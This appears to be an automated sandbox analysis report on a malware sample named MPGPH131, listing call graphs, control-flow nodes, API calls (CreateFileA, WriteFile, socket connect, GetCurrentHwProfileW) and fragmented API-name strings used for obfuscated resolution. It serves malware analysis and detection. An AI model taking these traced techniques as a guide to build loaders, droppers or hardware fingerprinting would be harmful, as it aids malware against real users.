___std_exception_copy 24375->24395 24382 b8bfb1 std::_Facet_Register 2 API calls 24376->24382 24384 b1acfa std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 24376->24384 24377->24375 24377->24379 24386 b8bfb1 24379->24386 24382->24384 24385 b1adba std::_Locinfo::_Locinfo_ctor std::locale::_Setgloballocale 24384->24385 24396 b914d0 RtlAllocateHeap ___std_exception_copy __Getctype 24384->24396 24385->24369 24389 b8bfb6 std::_Facet_Register 24386->24389 24388 b8bfd0 24388->24384 24389->24388 24391 ab1fa0 Concurrency::cancel_current_task 24389->24391 24397 b9ac4c 24389->24397 24390 b8bfdc 24390->24390 24391->24390 24403 b8d371 RtlAllocateHeap RtlAllocateHeap __freea ___std_exception_copy 24391->24403 24393 ab1fe3 24393->24384 24394->24375 24395->24384 24398 ba3b4d __dosmaperr std::_Facet_Register 24397->24398 24399 ba3b8b 24398->24399 24401 ba3b76 RtlAllocateHeap 24398->24401 24404 b99f5f RtlAllocateHeap __dosmaperr 24399->24404 24401->24398 24402 ba3b89 24401->24402 24402->24389 24403->24393 24404->24402 24653 ab2540 RtlAllocateHeap RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor 24640 ac9bc0 7 API calls 3 library calls 24654 ac4540 GetSystemTimePreciseAsFileTime __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __Xtime_get_ticks 24409 b95e56 24410 b95e69 ___std_exception_copy 24409->24410 24415 b95bad 24410->24415 24412 b95e7e 24422 b911fc RtlAllocateHeap ___std_exception_copy 24412->24422 24414 b95e8b 24417 b95bb9 std::_Locinfo::_Locinfo_ctor 24415->24417 24416 b95bbf 24432 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24416->24432 24417->24416 24419 b95c02 24417->24419 24423 b95d30 24419->24423 24421 b95bda 24421->24412 24422->24414 24424 b95d43 24423->24424 24425 b95d56 24423->24425 24424->24421 24433 b95c57 24425->24433 24427 b95d79 24431 b95e07 24427->24431 24437 b922f1 24427->24437 24431->24421 24432->24421 24434 b95cc0 24433->24434 24435 b95c68 24433->24435 24434->24427 24435->24434 24446 b9ae5d SetFilePointerEx RtlAllocateHeap ___std_exception_copy 24435->24446 24438 b92331 24437->24438 24439 b9230a 24437->24439 24443 b9ae9d 24438->24443 24439->24438 24447 ba2ca2 24439->24447 24441 b92326 24454 ba20ab 24441->24454 24498 b9ad7c 24443->24498 24445 b9aeb6 24445->24431 24446->24434 24448 ba2cae 24447->24448 24449 ba2cc3 24447->24449 24461 b99f5f RtlAllocateHeap __dosmaperr 24448->24461 24449->24441 24451 ba2cb3 24462 b914c0 RtlAllocateHeap ___std_exception_copy 24451->24462 24453 ba2cbe 24453->24441 24455 ba20b7 std::_Locinfo::_Locinfo_ctor 24454->24455 24456 ba20f8 24455->24456 24458 ba213e 24455->24458 24460 ba20bf 24455->24460 24477 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24456->24477 24458->24460 24463 ba21bc 24458->24463 24460->24438 24461->24451 24462->24453 24464 ba21e4 24463->24464 24476 ba2207 24463->24476 24465 ba21e8 24464->24465 24467 ba2243 24464->24467 24483 b91443 RtlAllocateHeap ___std_exception_copy __Getctype 24465->24483 24468 ba2261 24467->24468 24470 b9ae9d 2 API calls 24467->24470 24478 ba1d01 24468->24478 24470->24468 24472 ba2279 24472->24476 24484 ba18d2 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor _ValidateLocalCookies 24472->24484 24473 ba22c0 24474 ba2329 WriteFile 24473->24474 24473->24476 24474->24476 24476->24460 24477->24460 24485 bada74 24478->24485 24480 ba1d41 24480->24472 24480->24473 24481 ba1d13 24481->24480 24494 b96a30 RtlAllocateHeap RtlAllocateHeap std::_Locinfo::_Locinfo_ctor ___std_exception_copy 24481->24494 24483->24476 24484->24476 24486 bada8e 24485->24486 24487 bada81 24485->24487 24489 bada9a 24486->24489 24496 b99f5f RtlAllocateHeap __dosmaperr 24486->24496 24495 b99f5f RtlAllocateHeap __dosmaperr 24487->24495 24489->24481 24491 bada86 24491->24481 24492 badabb 24497 b914c0 RtlAllocateHeap ___std_exception_copy 24492->24497 24494->24480 24495->24491 24496->24492 24497->24491 24503 ba7400 24498->24503 24500 b9ad8e 24501 b9adaa SetFilePointerEx 24500->24501 24502 b9ad96 24500->24502 24501->24502 24502->24445 24504 ba740d 24503->24504 24506 ba7422 24503->24506 24516 b99f4c RtlAllocateHeap __dosmaperr 24504->24516 24509 ba7447 24506->24509 24518 b99f4c RtlAllocateHeap __dosmaperr 24506->24518 24508 ba7412 24517 b99f5f RtlAllocateHeap __dosmaperr 24508->24517 24509->24500 24510 ba7452 24519 b99f5f RtlAllocateHeap __dosmaperr 24510->24519 24513 ba741a 24513->24500 24514 ba745a 24520 b914c0 RtlAllocateHeap ___std_exception_copy 24514->24520 24516->24508 24517->24513 24518->24510 24519->24514 24520->24513

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 1050044-1050074 GetPEB 1 1050077-105009a 0->1 2 105009d-10500a0 1->2 3 10500a6-10500bc 2->3 4 10501ee-105022b CreateFileA 2->4 5 1050110-1050116 3->5 6 10500be-10500c5 3->6 27 1050265-1050269 4->27 28 105022d-1050230 4->28 9 1050129-105012f 5->9 10 1050118-105011f 5->10 6->5 7 10500c7-10500ce 6->7 7->5 11 10500d0-10500d7 7->11 13 1050131-1050138 9->13 14 1050148-105014e 9->14 10->9 12 1050121-1050124 10->12 11->5 17 10500d9-10500dd 11->17 19 10501bb-10501c0 12->19 13->14 20 105013a-1050141 13->20 15 1050167-105016f 14->15 16 1050150-1050157 14->16 24 1050171-1050178 15->24 25 1050188-105018e 15->25 16->15 23 1050159-1050160 16->23 17->5 26 10500df-10500e3 17->26 21 10501e0-10501e9 19->21 22 10501c2-10501c5 19->22 20->14 29 1050143-1050146 20->29 21->2 22->21 30 10501c7-10501ca 22->30 23->15 31 1050162-1050165 23->31 24->25 32 105017a-1050181 24->32 34 10501a7-10501ad 25->34 35 1050190-1050197 25->35 26->19 33 10500e9-105010b 26->33 36 1050232-1050238 28->36 29->19 30->21 37 10501cc-10501cf 30->37 31->19 32->25 38 1050183-1050186 32->38 33->1 34->19 40 10501af-10501b6 34->40 35->34 39 1050199-10501a0 35->39 41 1050246-1050251 36->41 42 105023a-1050242 36->42 37->21 43 10501d1-10501d4 37->43 38->19 39->34 45 10501a2-10501a5 39->45 40->19 46 10501b8 40->46 48 1050255-1050261 41->48 42->36 47 1050244 42->47 43->21 49 10501d6-10501d9 43->49 45->19 46->19 47->48 48->27 49->21 50 10501db-10501de 49->50 50->4 50->21
                                      APIs
                                      • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 01050223
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .dll$Clos$Crea$GetM$GetT$Kern$WinE$Writ$athA$catA$dleA$el32$lstr$odul$xRp.exe
                                      • API String ID: 823142352-2378254480
                                      • Opcode ID: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction ID: 53613071c213fd2b033819c0513f2790d4aa171d1789a8e0a9f3f1142b7a72cc
                                      • Opcode Fuzzy Hash: 427073a4ef8cdd273e52de3960116424fab24a684a798692c956fdf8c3eeff39
                                      • Instruction Fuzzy Hash: 91616174D01215DFCFA5CF98C984AAEFBB4BF44315F14C1AAE98567205C3709A81CF9A

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 52 acd620-acd652 WSAStartup 53 acd658-acd682 call ab7d20 * 2 52->53 54 acd726-acd72f 52->54 59 acd68e-acd6d4 53->59 60 acd684-acd688 53->60 62 acd6d6-acd6dc 59->62 63 acd720 59->63 60->54 60->59 64 acd6de 62->64 65 acd734-acd73e 62->65 63->54 66 acd6e4-acd6f8 socket 64->66 65->63 71 acd740-acd748 65->71 66->63 67 acd6fa-acd70a connect 66->67 69 acd70c-acd714 closesocket 67->69 70 acd730 67->70 69->66 72 acd716-acd71f 69->72 70->65 72->63
                                      APIs
                                      • WSAStartup.WS2_32 ref: 00ACD64B
                                      • socket.WS2_32(?,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD6EE
                                      • connect.WS2_32(00000000,?,?,?,?,?,00BE50C8,?,?), ref: 00ACD702
                                      • closesocket.WS2_32(00000000), ref: 00ACD70D
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Startupclosesocketconnectsocket
                                      • String ID:
                                      • API String ID: 3098855095-0
                                      • Opcode ID: 7d20025cf2e4111f9fab4008a36981b6073b83904d20b390c9e9f9170209f577
                                      • Instruction ID: 619fde5c42efbe93dd1003e5db0a5d5b0b3b143f9d8699db443a655cb8fcaee4
                                      • Opcode Fuzzy Hash: 7d20025cf2e4111f9fab4008a36981b6073b83904d20b390c9e9f9170209f577
                                      • Instruction Fuzzy Hash: 8731C4725053509BD7209F248844B6FB7E5FFC5374F111F2EF8A8A3290D771990486A2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 74 5610631-5610847 call 561084c 99 5610895-56108cb 74->99 100 5610849-561084b 74->100 103 56108d6-56108f2 GetCurrentHwProfileW 99->103 105 5610902-5610b86 103->105
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 2b79dae96fa96d9e7dfb2f28b60ab1c17184c0a748c54f1f3a717ab1fd473be3
                                      • Instruction ID: 5f96b2395f414d5363e8df147e4e55781410de55641f110b767cb0f524fccdfb
                                      • Opcode Fuzzy Hash: 2b79dae96fa96d9e7dfb2f28b60ab1c17184c0a748c54f1f3a717ab1fd473be3
                                      • Instruction Fuzzy Hash: 6761B0EB14D120BEB942C1852B6CEF7676FE6CA730738C427FC07D6502E6944ACA9179

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 135 561084c-561085a call 561085e 138 5610861-56108cb 135->138 139 561085c-5610860 135->139 145 56108d6-56108f2 GetCurrentHwProfileW 138->145 139->138 147 5610902-5610b86 145->147
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: a6cbfb5825c26bce854597b95ee16b9ab701cecfb9366ee6db54bf52adb61cf0
                                      • Instruction ID: bdf93ccc00d293f7c8f25b90f76689e9332f51aa485e50ac36bebe61b289e372
                                      • Opcode Fuzzy Hash: a6cbfb5825c26bce854597b95ee16b9ab701cecfb9366ee6db54bf52adb61cf0
                                      • Instruction Fuzzy Hash: C441D4FB14D124BFB952C0852B28AF6676FE6C67307388477FC07D6202EA840ECA9175

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 177 561085e-56108cb 183 56108d6-56108f2 GetCurrentHwProfileW 177->183 185 5610902-5610b86 183->185
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 249f9e83bfb85ed756cefc64403f252f28fe1733019edb9578bc4eab05f8a3b9
                                      • Instruction ID: 6dcf18ae2beaab9012122f3ee267844d563c2eb0691da9125df5a93a676e6b01
                                      • Opcode Fuzzy Hash: 249f9e83bfb85ed756cefc64403f252f28fe1733019edb9578bc4eab05f8a3b9
                                      • Instruction Fuzzy Hash: 1041C3FB14D124BEB952C0852B28AF6676FE6CA7307348477FC07D6206EAC44ECA9175

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 215 561086d-561086f 216 5610871-56108c5 215->216 217 56108cb 215->217 216->217 219 56108d6-56108f2 GetCurrentHwProfileW 217->219 222 5610902-5610b86 219->222
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 7d16a383a7fe66598eac22a170cf3928baa2b5d397659e4d49b2d3dcb5ff74b8
                                      • Instruction ID: 26df1941e1f1bdbf7dde1aeda4467201917e0e177a9662d46340f4afc1208798
                                      • Opcode Fuzzy Hash: 7d16a383a7fe66598eac22a170cf3928baa2b5d397659e4d49b2d3dcb5ff74b8
                                      • Instruction Fuzzy Hash: A541C2FB14D124BEB952C0852B28AF6666FE6C67307348477FC07D6602EAC40ECA9175

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 253 561087d-56108cb 258 56108d6-56108f2 GetCurrentHwProfileW 253->258 260 5610902-5610b86 258->260
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 2a4a325a39777ef91778c6239578b51763843ec84b45adbfde7b58f5ac1fa289
                                      • Instruction ID: cb98580c6ae313a1903ffaad0d33aa774b072e4b77e4e392fdd201baf702a673
                                      • Opcode Fuzzy Hash: 2a4a325a39777ef91778c6239578b51763843ec84b45adbfde7b58f5ac1fa289
                                      • Instruction Fuzzy Hash: 9541B1FB14D124BEB952C0852B28AFA666FE6CA7303348477FC07D6606E6C44ECA9175

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 290 56108b6-56108cb 293 56108d6-56108f2 GetCurrentHwProfileW 290->293 295 5610902-5610b86 293->295
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: b790e3f518671f2eb06766b4f0c6a2e52161afee2a9f25e5398e99716017b9f7
                                      • Instruction ID: e247fdaf4ce6569f531136449fc0c9469e1e8918cae5a552fa5bd37edc1ac6bf
                                      • Opcode Fuzzy Hash: b790e3f518671f2eb06766b4f0c6a2e52161afee2a9f25e5398e99716017b9f7
                                      • Instruction Fuzzy Hash: DC41D3FB14D124BEB902C0852B68AFA676FE6CA7307348477FC07D6106E6950ECA9275

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 325 ba21bc-ba21de 326 ba23d1 325->326 327 ba21e4-ba21e6 325->327 330 ba23d3-ba23d7 326->330 328 ba21e8-ba2207 call b91443 327->328 329 ba2212-ba2235 327->329 336 ba220a-ba220d 328->336 332 ba223b-ba2241 329->332 333 ba2237-ba2239 329->333 332->328 335 ba2243-ba2254 332->335 333->332 333->335 337 ba2256-ba2264 call b9ae9d 335->337 338 ba2267-ba2277 call ba1d01 335->338 336->330 337->338 343 ba2279-ba227f 338->343 344 ba22c0-ba22d2 338->344 345 ba22a8-ba22be call ba18d2 343->345 346 ba2281-ba2284 343->346 347 ba2329-ba2349 WriteFile 344->347 348 ba22d4-ba22da 344->348 370 ba22a1-ba22a3 345->370 349 ba228f-ba229e call ba1c99 346->349 350 ba2286-ba2289 346->350 352 ba234b-ba2351 347->352 353 ba2354 347->353 354 ba22dc-ba22df 348->354 355 ba2315-ba2327 call ba1d7e 348->355 349->370 350->349 358 ba2369-ba236c 350->358 352->353 362 ba2357-ba2362 353->362 356 ba2301-ba2313 call ba1f42 354->356 357 ba22e1-ba22e4 354->357 376 ba22fc-ba22ff 355->376 356->376 365 ba22ea-ba22f7 call ba1e59 357->365 366 ba236f-ba2371 357->366 358->366 363 ba23cc-ba23cf 362->363 364 ba2364-ba2367 362->364 363->330 364->358 365->376 373 ba239f-ba23ab 366->373 374 ba2373-ba2378 366->374 370->362 379 ba23ad-ba23b3 373->379 380 ba23b5-ba23c7 373->380 377 ba237a-ba238c 374->377 378 ba2391-ba239a call b99f28 374->378 376->370 377->336 378->336 379->326 379->380 380->336
                                      APIs
                                      • WriteFile.KERNELBASE(?,00000000,00B95DA7,?,00000000,00000000,00000000,?,00000000,?,00B8B2D2,00B95DA7,00000000,00B8B2D2,?,?), ref: 00BA2341
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 718316b4db576a46760030e8d97d68f1dd76f5109f9eff5c9d2d0cccfbbc2b9c
                                      • Instruction ID: b8f29d641bc96862294e53bdf279ba65bda011e3931db04cbc006bc6aecbb7dd
                                      • Opcode Fuzzy Hash: 718316b4db576a46760030e8d97d68f1dd76f5109f9eff5c9d2d0cccfbbc2b9c
                                      • Instruction Fuzzy Hash: 9D61A171D08259AEDF15CFACC884AEEBBF9EF0B304F1405D5E900AB256D375D9018BA4

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 383 56108f7-56108fe 384 5610900 383->384 385 56108df-56108f2 GetCurrentHwProfileW 383->385 386 5610902-5610b86 384->386 385->386
                                      APIs
                                      • GetCurrentHwProfileW.ADVAPI32(?), ref: 056108DF
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4135864812.0000000005610000.00000040.00001000.00020000.00000000.sdmp, Offset: 05610000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_5610000_MPGPH131.jbxd
                                      Similarity
                                      • API ID: CurrentProfile
                                      • String ID:
                                      • API String ID: 2104809126-0
                                      • Opcode ID: 449590e5436389bf938ae38991c3122859a399f9eddc0128713b545ffd64ceab
                                      • Instruction ID: ece726391ebbb00b085851e275961cc99a22887a6859daaac862ebf5b31ee4a2
                                      • Opcode Fuzzy Hash: 449590e5436389bf938ae38991c3122859a399f9eddc0128713b545ffd64ceab
                                      • Instruction Fuzzy Hash: 4E31C2FB14D124BEB912C0452B68AFA666FE6CA730734C477FC07D2106E7844ECA9279

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 416 b1acb0-b1accf 417 b1acd5-b1ace8 416->417 418 b1adfc call ab2040 416->418 419 b1ad13-b1ad1b 417->419 420 b1acea 417->420 425 b1ae01 call ab1fa0 418->425 422 b1ad24-b1ad34 419->422 423 b1ad1d-b1ad22 419->423 424 b1acec-b1acf1 420->424 426 b1ad43-b1ad45 422->426 427 b1ad36-b1ad3b 422->427 423->424 428 b1acf4-b1acf5 call b8bfb1 424->428 430 b1ae06-b1ae0b call b914d0 425->430 432 b1ad57 426->432 433 b1ad47-b1ad55 call b8bfb1 426->433 427->425 431 b1ad41 427->431 435 b1acfa-b1acff 428->435 431->428 438 b1ad59-b1ad7c 432->438 433->438 435->430 439 b1ad05-b1ad11 435->439 442 b1add3-b1adf9 call b8dc90 call b8e210 438->442 443 b1ad7e-b1ada8 call b8dc90 call b8e210 438->443 439->438 452 b1adaa-b1adb8 443->452 453 b1adbc-b1add0 call b8c232 443->453 452->430 454 b1adba 452->454 454->453
                                      APIs
                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00B1AE01
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000BEC000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000D6B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E52000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E90000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000E99000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127861133.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130037960.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130471329.000000000104C000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130512754.000000000104D000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130560904.0000000001050000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4130607948.0000000001051000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_9_2_ab0000_MPGPH131.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Concurrency::cancel_current_task
                                      • String ID:
                                      • API String ID: 118556049-0
                                      • Opcode ID: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction ID: 39eb036681f86293bb6c5fd4e4a559f652a5300d4aef237bdd20c7516cc80769
                                      • Opcode Fuzzy Hash: 5f6501d9be5c228ccdbdf34a1afbcca321d78abc42ce241e78f29807ad35457f
                                      • Instruction Fuzzy Hash: 1E41D372A011049BCB15EF68DD806AEBBE5EF45311B6402B9F814EB251D730EE51DBD2

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 457 ba1832-ba1846 call ba7400 460 ba1848-ba184a 457->460 461 ba184c-ba1854 457->461 462 ba189a-ba18ba call ba736f 460->462 463 ba185f-ba1862 461->463 464 ba1856-ba185d 461->464 474 ba18cc 462->474 475 ba18bc-ba18ca call b99f28 462->475 465 ba1880-ba1890 call ba7400 FindCloseChangeNotification 463->465 466 ba1864-ba1868 463->466 464->463 468 ba186a-ba187e call ba7400 * 2 464->468 465->460 479 ba1892-ba1898 465->479 466->465 466->468 468->460 468->465 477 ba18ce-ba18d1 474->477 475->477 479->462
                                      APIs
                                      • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,00BA1719,00000000,CF830579,00BDFCB8,0000000C,00BA17D5,00B958DD,?), ref: 00BA1888
                                      Memory Dump Source
                                      • Source File: 00000009.00000002.4126911252.0000000000AB1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00AB0000, based on PE: true
                                      • Associated: 00000009.00000002.4126840184.0000000000AB0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4126911252.0000000000BE2000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                      • Associated: 00000009.00000002.4127775925.0000000000BE6000.00000004.00000001.01000000.0000000A.sdmpDownload File
